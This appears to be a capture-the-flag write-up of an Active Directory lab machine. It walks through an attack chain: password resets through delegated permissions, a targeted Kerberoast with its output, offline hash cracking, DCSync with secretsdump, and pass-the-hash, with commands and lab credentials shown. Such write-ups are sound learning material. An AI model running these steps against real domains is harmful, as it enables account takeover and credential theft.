| Machine Name | Difficulty | Date Started | Date Completed |
|---|---|---|---|
| Administrator | Medium | 11/04/2025 | 11/04/2025 |
Learning Points:
- Practiced password hash cracking using
Johnandpwsafe2john.
Attack Path:
- Assumed breach with user
olivia, enumerated AD using BloodHound. - Identified and abused
GenericAllpermission to resetmichael’s password. - Used
michaelto resetbenjamin’s password viaForceChangePassword. - Logged in as
benjaminvia FTP, retrieved and cracked a psafe3 vault. - Extracted
emily’s credentials and accessed the target machine using Evil-WinRM. - Performed a targeted Kerberoast attack on
ethanusingGenericWrite, cracked the hash. - Abused
DCSyncwithethan, dumped administrator hashes usingsecretsdump. - Logged in as
administrator, completed the machine.
We were provided with credentials to perform this as an assumed breach scenario. The user we were given didn’t have access to any specific file shares.
We ran BloodHound (Python version) and were able to enumerate the AD further.
The Olivia user had GenericAll, but we were not able to abuse that permission.
We enumerated other paths and identified the following attack path:
We performed a targeted Kerberoast attack on the michael user but failed.
By abusing the GenericAll permission, we changed the password of the michael user using olivia:
net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"
We then abused the ForceChangePassword permission in the same way using the michael account and gained access to the benjamin user.
We used FTP to log in to the server as the benjamin user and retrieved an encrypted psafe3 file:
We cracked the hash using pwsafe2john and retrieved the master password of the vault.
We obtained the password of the emily user and used Evil-WinRM to log in to the machine and retrieve the user flag.
Privilege Escalation
We enumerated more attack paths from the emily user and identified the following path:
We abused GenericWrite by performing a targeted Kerberoast attack and obtained the hash of the ethan user.
┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# timedatectl set-ntp off
┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# rdate -n administrator.htb
Fri Apr 11 20:58:51 +0530 2025
┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$51893f5b4fd3<SNIP>6343344b67f3e85077cbbe1354ad21128b5048316075f7138
[VERBOSE] SPN removed successfully for (ethan)
We cracked the hash using John and obtained the password:
┌──(destiny㉿falcon)-[~/shared/tools-backup/targetedKerberoast]
└─$ john ethan.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit (?)
1g 0:00:00:00 DONE (2025-04-11 21:00) 100.0g/s 819200p/s 819200c/s 819200C/s newzealand..total90
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We used impacket-secretsdump to abuse the DCSync permission and obtained the administrator hash.
Performed a pass-the-hash attack and successfully logged in as root to complete the machine.
